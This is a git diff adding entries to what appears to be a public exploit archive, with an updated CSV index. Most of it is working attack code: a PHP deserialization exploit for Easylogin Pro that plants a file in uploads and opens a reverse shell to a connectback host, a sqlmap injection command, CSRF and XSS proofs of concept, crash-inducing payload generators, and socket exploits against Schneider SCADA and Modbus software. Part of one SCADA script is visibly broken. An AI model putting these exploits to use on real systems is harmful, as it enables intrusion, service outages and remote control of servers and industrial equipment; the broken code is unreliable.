diff --git a/exploits/php/remote/45227.php b/exploits/php/remote/45227.php new file mode 100644 index 000000000..6209e7b35 --- /dev/null +++ b/exploits/php/remote/45227.php @@ -0,0 +1,377 @@ +#!/usr/bin/php + -c +-t: target server (ip with or without port) +-c: connectback server (ip and port) +Example: +php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 +---------------------------------------------------- +mr_me@pluto:~$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 + +Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability +bug found by: @f99942 +tekniq/exploit by: @steventseeley (mr_me) + +(+) snap... +(+) crackle... +(+) pop! +(+) connectback from 172.16.175.137 via port 41860 + +www-data@target:/var/www/html/uploads$ id;uname -a +uid=33(www-data) gid=33(www-data) groups=33(www-data) +Linux target 4.15.0-30-generic #32-Ubuntu SMP Thu Jul 26 17:42:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux +www-data@target:/var/www/html/uploads$ ls -la +total 12 +drwxrwxrwx 2 www-data www-data 4096 Aug 12 23:06 . +drwxr-xr-x 9 www-data www-data 4096 Aug 9 14:49 .. +-rwxrwxrwx 1 root root 13 Dec 12 2017 .gitignore +www-data@target:/var/www/html/uploads$ php --version +PHP 7.2.7-0ubuntu0.18.04.2 (cli) (built: Jul 4 2018 16:55:24) ( NTS ) +Copyright (c) 1997-2018 The PHP Group +Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies + with Zend OPcache v7.2.7-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies +www-data@target:/var/www/html/uploads$ +*/ + +namespace GuzzleHttp\Cookie; + +// change these to work against your target +$key = "OPudCtPyxzAGw8LkQowOoQAc88dvULGB"; +$path = "/var/www/html"; + +class Encrypter { + protected $key; + protected $cipher; + + public function __construct($key, $cipher = 'AES-256-CBC'){ + $key = (string) $key; + $this->key = $key; + $this->cipher = $cipher; + } + + public function encrypt($value, $serialize = true){ + $iv = random_bytes(openssl_cipher_iv_length($this->cipher)); + $value = openssl_encrypt( + $serialize ? serialize($value) : $value, + $this->cipher, $this->key, 0, $iv + ); + if ($value === false) { + throw new EncryptException('Could not encrypt the data.'); + } + $mac = $this->hash($iv = base64_encode($iv), $value); + $json = json_encode(compact('iv', 'value', 'mac')); + if (json_last_error() !== JSON_ERROR_NONE) { + throw new EncryptException('Could not encrypt the data.'); + } + return base64_encode($json); + } + + public function encryptString($value){ + return $this->encrypt($value, false); + } + + protected function hash($iv, $value){ + return hash_hmac('sha256', $iv.$value, $this->key); + } +} + +// pop chain +interface ToArrayInterface {} + +class SetCookie implements ToArrayInterface { + private $data; + + public function __construct(array $data = []){ + $this->data = $data; + } +} + +class CookieJar implements ToArrayInterface { + private $cookies; + + public function setCookie(SetCookie $cookie){ + $this->cookies = array($cookie); + } +} + +class FileCookieJar extends CookieJar { + private $filename; + + public function __construct($bd_file, $cbh, $cbp){ + $this->filename = $bd_file; + $this->setCookie(new SetCookie(array( + "Value" => '', + "Expires" => true, + "Discard" => false, + ))); + } +} + +class Exploit{ + private $target; + private $targetport; + private $cbhost; + private $cbport; + private $key; + private $path; + + public function __construct($t, $tp, $cbh, $cbp, $k, $p){ + $this->target = $t; + $this->targetport = $tp; + $this->cbhost = $cbh; + $this->cbport = $cbp; + $this->key = $k; + $this->path = $p; + } + + public function run(){ + + // its possible to leak the path if app.php contains 'debug' => true + // also, uploads is writable by default for avatars + $fcj = new FileCookieJar("$this->path/uploads/si.php", $this->cbhost, $this->cbport); + $e = new Encrypter($this->key); + $this->p = $e->encryptString(serialize($fcj)); + + // hardcoded md5 of the class name 'Hazzard\Auth\Auth' for the cookie login + $c = $this->do_get("index.php", array("Cookie: login_ac5456751dd3c394383a14228642391e=$this->p")); + if ($c === 500){ + print "(+) pop!\r\n"; + + // start our listener + $s = new Shell($this->cbport); + $s->start(); + + // msf reverse shell with some stuff modified + $rs = <<<'PHP' +@error_reporting(-1); +@set_time_limit(0); +@ignore_user_abort(1); +$dis=@ini_get('disable_functions'); +if(!empty($dis)){ + $dis=preg_replace('/[, ]+/', ',', $dis); + $dis=explode(',', $dis); + $dis=array_map('trim', $dis); +}else{ + $dis=array(); +} +$ipaddr='[cbhost]'; +$port=[cbport]; +function PtdSlhY($c){ + global $dis; + if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { + $c=$c." 2>&1\n"; + } + ob_start(); + system($c); + $o=ob_get_contents(); + ob_end_clean(); + if (strlen($o) === 0){ + $o = "NULL"; + } + return $o; +} +// we disappear like a fart in the wind +@unlink("si.php"); +$nofuncs='no exec functions'; +$s=@fsockopen("tcp://$ipaddr",$port); +while($c=fread($s,2048)){ + $out = ''; + if(substr($c,0,3) == 'cd '){ + chdir(substr($c,3,-1)); + }else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { + break; + }else{ + $out=PtdSlhY(substr($c,0,-1)); + if($out===false){ + fwrite($s, $nofuncs); + break; + } + } + fwrite($s,$out); +} +fclose($s); +PHP; + $rs = str_replace("[cbhost]", $this->cbhost, $rs); + $rs = str_replace("[cbport]", $this->cbport, $rs); + $php = base64_encode($rs); + $this->do_get("uploads/si.php", array("si: $php")); + } + } + + private function do_get($p = "index.php", array $h = []){ + $curl = curl_init(); + curl_setopt_array($curl, array( + CURLOPT_RETURNTRANSFER => 1, + CURLOPT_URL => "http://$this->target/$p", + CURLOPT_HTTPHEADER => $h, + CURLOPT_PORT => (int) $this->targetport + )); + $resp = curl_exec($curl); + return curl_getinfo($curl, CURLINFO_HTTP_CODE); + } +} + +class Shell extends \Thread{ + private $cbport; + + public function __construct($cbp){ + $this->cbport = $cbp; + } + + public function run(){ + $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); + $ret = @socket_bind($sock, 0, (int) $this->cbport); + $ret = @socket_listen($sock, 5); + $msgsock = @socket_accept($sock); + @socket_close($sock); + $start = true; + $fp = fopen("php://stdin", "r"); + while(false !== @socket_select($r = array($msgsock))){ + if ($start === true){ + if (socket_getpeername($r[0], $a, $p) === true){ + print "(+) connectback from $a via port $p\r\n"; + $s = $this->exec_cmd($msgsock, "echo `whoami`@`hostname`:\n"); + } + } + $start = false; + + // the pretty shells illusion + print "\r\n".$s.$this->exec_cmd($msgsock, "echo `pwd`\n")."$ "; + + // get our command... + $c = fgets($fp); + + // if the attacker enters nothing, continue... + if (strpos("\n", $c) === 0){ + continue; + } + if (strpos($c, "cd") === false){ + print $this->exec_cmd($msgsock, $c); + }elseif (strpos($c, "cd") !== false){ + $this->exec_cmd($msgsock, $c, false); + } + if(in_array($c, array("exit\n", "quit\n"))){ + break; + } + } + fclose($fp); + } + + private function exec_cmd($c, $cmd, $ret=true){ + + // send our command to the reverse shell + @socket_write($c, $cmd, strlen($cmd)); + + if ($ret == true){ + // we don't care to get the shell prompt back... + $resp = trim(@socket_read($c, 2048, PHP_BINARY_READ)); + if ($resp === "NULL"){ + return ""; + }else{ + return $resp; + } + } + } +} + +print_r("\r\nEasylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability +Bug found by: @f99942 +Tekniq/exploit by: @steventseeley (mr_me)\r\n"); + +if ($argc < 3) { +print_r(" +---------------------------------------------------- +Usage: php ".$argv[0]." -t -c +-t: target server (ip with or without port) +-c: connectback server (ip and port) +Example: +php ".$argv[0]." -t 172.16.175.136 -c 172.16.175.137:1337 +---------------------------------------------------- +"); die; } + +function set_args($argv) { + $_ARG = array(); + foreach ($argv as $arg) { + if (preg_match("/--([^=]+)=(.*)/", $arg, $reg)) { + $_ARG[$reg[1]] = $reg[2]; + } elseif(preg_match("/^-([a-zA-Z0-9])/", $arg, $reg)) { + $_ARG[$reg[1]] = "true"; + } else { + $_ARG["input"][] = $arg; + } + } + return $_ARG; +} + +$args = set_args($argv); +$host = $args["input"]["1"]; +$cbsp = $args["input"]["2"]; + +if (strpos($host, ":") == true){ + $host_and_port = explode(":", $host); + $host = $host_and_port[0]; + $port = $host_and_port[1]; +}else{ + $port = 80; +} + +if (strpos($cbsp, ":") == true){ + $cbhost_and_cbport = explode(":", $cbsp); + $cbhost = $cbhost_and_cbport[0]; + $cbport = $cbhost_and_cbport[1]; +}else{ + $cbport = 1337; +} + +$ip_regex = "(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b)"; +if ((preg_match($ip_regex, $host) === 1) && (preg_match($ip_regex, $cbhost) === 1)){ + + // exploit entry + $poc = new Exploit($host, $port, $cbhost, $cbport, $key, $path); + print "\r\n(+) snap...\r\n(+) crackle...\r\n"; + $poc->run(); +} +/* +eyJpdiI6InFGcWFDMW9aMEFwWmo2XC9RRkhxZ3JBPT0iLCJ2YWx1ZSI6IjdpVExUQWpaYVpu +RjVVRElxczg1YUVpSWl2bEtXOVwvY3BVaDFkc0NNY0Y4NkhMME9XNE9PZHJxc0FhUFBlenpi +VWtJSUNHWE9RYU5MQjVnOUgzUkt4RGc0QlE4TDNZSnpueFZlblVjM3NnVXFmeE0zSnZaRFA2 +a2gxU1l2QlVYNW5pUkZEd3c2RFJWYnpqRFkyUmdOQW5vZkVtaFA0Y2JDRW1kUU5mNWtGdmh3 +WDJWYlBmQU0rTkFwWExQOERWcEZDVTYzU255VEFaTzN4MzhZTEUxWElRbnNCZ1grWm9rN3Vh +MzBzSnYrSGpjMmlRRWMxZWVTbDVhN29uOG1RazBJIiwibWFjIjoiOThmYTM5ZDc3M2FlMGVh +NTI3ZWI2ZGNkODQ5N2ZmZmExNDA3YjdjYzYzMGRlODY3NDZmMjRkYTBiNmVjMGJmMCJ9 +*/ +?> \ No newline at end of file diff --git a/exploits/php/webapps/45221.txt b/exploits/php/webapps/45221.txt new file mode 100644 index 000000000..23aa25733 --- /dev/null +++ b/exploits/php/webapps/45221.txt @@ -0,0 +1,21 @@ +# Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection +# Exploit Author: Çlirim Emini +# Website: https://www.sentry.co.com +# Software Link: https://wordpress.org/plugins/chained-quiz/ +# Version/s: 1.0.8 and below +# Patched Version: 1.0.9 +# CVE : N/A +# WPVULNDB: https://wpvulndb.com/vulnerabilities/9112 + +# Vulnerability Description: +# WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated +# users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters. + +# Technical details: +# Chained Quiz appears to be vulnerable to time-based SQL-Injection. +# The issue lies on the $answer backend variable. +# Privileges required: None + +# Proof of Concept (PoC): + +sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=1&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T \ No newline at end of file diff --git a/exploits/php/webapps/45224.txt b/exploits/php/webapps/45224.txt new file mode 100644 index 000000000..81f162fc2 --- /dev/null +++ b/exploits/php/webapps/45224.txt @@ -0,0 +1,29 @@ +# Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery +# Date: 2018-05-17 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Software Link: https://community.mybb.com/mods.php?action=view&pid=1105 +# Version: 1.1 +# Tested on: Ubuntu 18.04 + +# 1. Description: +# The plugin allows moderators to save notes and display them in a list in the modCP. +# The CSRF allows an attacker to remotely delete all mod notes and mod note logs +# in the modCP & ACP. + +# 2. Proof of Concept: + + + + <-- Deletes mod note logs --> + + <-- Deletes mod notes --> + + + + + \ No newline at end of file diff --git a/exploits/php/webapps/45225.txt b/exploits/php/webapps/45225.txt new file mode 100644 index 000000000..90e822619 --- /dev/null +++ b/exploits/php/webapps/45225.txt @@ -0,0 +1,23 @@ +# Exploit Title: WordPress Plugin Tagregator 0.6 - Cross-Site Scripting +# Date: 2018-05-05 +# Exploit Author: ManhNho +# Vendor Homepage: https://wordpress.org/plugins/tagregator/ +# Software Link: https://downloads.wordpress.org/plugin/tagregator.0.6.zip +# Ref: https://pastebin.com/ZGr5tyP2 +# Version: 0.6 +# Tested on: CentOS 6.5 +# CVE : CVE-2018-10752 +# Category : Webapps + +# 1. Description +# WordPress Plugin Tagregator 0.6 - Stored XSS + +# 2. Proof of Concept + +1. Login to admin panel +2. Access to Wordpress Tagregator setting, then choose Tweets/Instagram +Media/Flickr Post/Google+ Activities and click "Add New" button +3. In title field, inject XSS pattern such as: + and click Preview button +4. This site will response url that will alert popup named xss +5. Send this xss url to another administrators, we have same alert \ No newline at end of file diff --git a/exploits/php/webapps/45228.txt b/exploits/php/webapps/45228.txt new file mode 100644 index 000000000..1e971bccb --- /dev/null +++ b/exploits/php/webapps/45228.txt @@ -0,0 +1,34 @@ +############################################################################ +# Exploit Title: Countly-server Stored(Persistent) XSS Vulnerability +# Date: Monday - 2018 13 August +# Author: 10:10AM Team +# Discovered By: Sleepy +# Software Link: https://github.com/Countly/countly-server +# Version: All Version +# Category: Web-apps +# Security Risk: Critical +# Tested on: GNU/Linux Ubuntu 16.04 - win 10 +############################################################################ +# Exploit: +# Description: +# +# Attacker can use multiple parameters in the provided link to inject his own data in the database +# of this application,the injected data can then be directly viewed in the event logs panel +# (manage>logger). +# Attacker may use this vulnerability to inject his own payload for attacks like Stored XSS. +# The injected payload will be executed everytime that the target page gets visited/refreshed. +# +# Proof of Concept: +# +# Injection URL: +# +# � http://[server_ip]:[api_port]/i?api_key=[api_key]¶meter_1=[payload_1]¶meter_2=[payload_2]&etc... +# +# Execution URL(login to server dashboard and navigate to "event logs" panel): +# +# � http://[server_ip]:[server_port]/dashboard#/[app_key]/manage/logger +# +# +############################################################################ +# WE ARE: Sleepy({ssleeppyy@gmail.com}), Mikili({mikili.land@gmail.com}) +############################################################################ \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45222.py b/exploits/windows_x86-64/dos/45222.py new file mode 100755 index 000000000..7ae7f8581 --- /dev/null +++ b/exploits/windows_x86-64/dos/45222.py @@ -0,0 +1,25 @@ +# Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-08-19 +# Homepage: https://www.zortam.com +# Software Link: https://www.zortam.com/download.html +# Tested Version: 23.95 +# Tested on OS: Windows 7 x64 +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt" just copy the text inside "exploit.txt" +# and start the program. Once inside of the program click "Continue". In the new window paste the content of +# "exploit.txt" into the following field: "Select". Click "Ok" and you will see a crash. + +#!/usr/bin/python + +buffer = "A" * 2000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45223.py b/exploits/windows_x86-64/dos/45223.py new file mode 100755 index 000000000..01fc28aca --- /dev/null +++ b/exploits/windows_x86-64/dos/45223.py @@ -0,0 +1,25 @@ +# Exploit Title: Restorator 1793 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-08-19 +# Homepage: https://www.bome.com/ +# Software Link: https://www.bome.com/bome/downloads/Restorator2018_Full_1793.exe +# Tested Version: v1793 +# Tested on OS: Windows 7 x64 +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt" just copy the text inside "exploit.txt" +# and start the program. In the new window paste the content of +# "exploit.txt" into the following field: "Name". Click "Ok" and you will see a crash. + +#!/usr/bin/python + +buffer = "A" * 4000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/dos/45219.py b/exploits/windows_x86/dos/45219.py new file mode 100755 index 000000000..73fa15ba1 --- /dev/null +++ b/exploits/windows_x86/dos/45219.py @@ -0,0 +1,31 @@ +# Title: SEIG Modbus 3.4 - Denial of Service (PoC) +# Author: Alejandro Parodi +# Date: 2018-08-17 +# Vendor Homepage: https://www.schneider-electric.com +# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4 +# Version: v3.4 +# Tested on: Windows7 x86 +# CVE: CVE-2013-0662 +# References: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662 + +import socket +import struct +import time + +ip = "192.168.127.137" +port = 27700 +con = (ip, port) + +header_padding = "\x00\xAA" +header_buffer_size = "\xFF\xFF" +header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno) +header_end = "\xFF" + +header = header_padding + header_buffer_size + header_recv_len + header_end +message = "\x00\x64" + "A" * 2267 + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(con) +s.send(header) +s.send(message) \ No newline at end of file diff --git a/exploits/windows_x86/dos/45226.py b/exploits/windows_x86/dos/45226.py new file mode 100755 index 000000000..1b67e8d69 --- /dev/null +++ b/exploits/windows_x86/dos/45226.py @@ -0,0 +1,29 @@ +# Exploit Title: Prime95 29.4b7 - Denial Of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-08-20 +# Homepage: http://www.mersenne.org +# Software Link: http://www.mersenne.org/ftp_root/gimps/p95v294b7.win32.zip +# Tested Version: 29.4b7 +# Tested on OS: Windows 7 32-bit + +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt" just copy the text inside "exploit.txt" +# and start the program. +# In the new window click "Test" > "PrimeNet" > "Connection..". +# Now enter some test information into the fields until you reach the last field. +# Paste the content of "exploit.txt" into the last field: "Optional proxy password". +# Click "Ok" > "Ok" and you will see a crash. + +#!/usr/bin/python + +buffer = "A" * 6000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/remote/45218.py b/exploits/windows_x86/remote/45218.py new file mode 100755 index 000000000..6d359155f --- /dev/null +++ b/exploits/windows_x86/remote/45218.py @@ -0,0 +1,67 @@ +# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution +# Author: Alejandro Parodi +# Date: 2018-08-17 +# Vendor Homepage: https://www.schneider-electric.com +# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/ +# Version: v9 +# Tested on: Windows7 x86 +# CVE: CVE-2013-0657 +# References: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657 + +import socket +import struct + +ip = "192.168.0.23" +port = 12397 +con = (ip, port) + +# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER) +# length = "\x00\x70\x00\x00\x00\x00\x00\x00" +# message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644 +# payload = length+message + +# Exploit Magic +message_header = struct.pack("H", 0x6000) +padding = "B" * 3344 +eip_safeseh_bypass_address = struct.pack("H", len(message)) +header_end = "\x44" + +header = header_padding + header_buf_size + header_recv_len + header_end +########################## + +######## CRAFTING PAYLOAD ######## +payload = header + message +print "Package Len: "+hex(len(payload)) + " bytes" +################################## + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(con) +s.send(payload) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 59b8b72e2..6f2ce89f8 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6055,6 +6055,10 @@ id,file,description,date,author,type,platform,port 45215,exploits/windows/dos/45215.js,"Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion",2018-08-17,"Google Security Research",dos,windows, 45216,exploits/windows/dos/45216.js,"Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion",2018-08-17,"Google Security Research",dos,windows, 45217,exploits/windows/dos/45217.js,"Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion",2018-08-17,"Google Security Research",dos,windows, +45219,exploits/windows_x86/dos/45219.py,"SEIG Modbus 3.4 - Denial of Service (PoC)",2018-08-20,"Alejandro Parodi",dos,windows_x86,27700 +45222,exploits/windows_x86-64/dos/45222.py,"Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64, +45223,exploits/windows_x86-64/dos/45223.py,"Restorator 1793 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64, +45226,exploits/windows_x86/dos/45226.py,"Prime95 29.4b7 - Denial Of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -16700,6 +16704,9 @@ id,file,description,date,author,type,platform,port 45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001 45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64, 45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux, +45218,exploits/windows_x86/remote/45218.py,"SEIG SCADA System 9 - Remote Code Execution",2018-08-19,"Alejandro Parodi",remote,windows_x86,12397 +45220,exploits/windows_x86/remote/45220.py,"SEIG Modbus 3.4 - Remote Code Execution",2018-08-20,"Alejandro Parodi",remote,windows_x86, +45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39817,3 +39824,7 @@ id,file,description,date,author,type,platform,port 45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php, 45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80 45212,exploits/hardware/webapps/45212.py,"ADM 3.1.2RHG1 - Remote Code Execution",2018-08-17,"Matthew Fulton",webapps,hardware,443 +45221,exploits/php/webapps/45221.txt,"WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection",2018-08-20,"Çlirim Emini",webapps,php,80 +45224,exploits/php/webapps/45224.txt,"MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery",2018-08-20,0xB9,webapps,php,80 +45225,exploits/php/webapps/45225.txt,"WordPress Plugin Tagregator 0.6 - Cross-Site Scripting",2018-08-20,ManhNho,webapps,php, +45228,exploits/php/webapps/45228.txt,"Countly - Persistent Cross-Site Scripting",2018-08-20,Sleepy,webapps,php,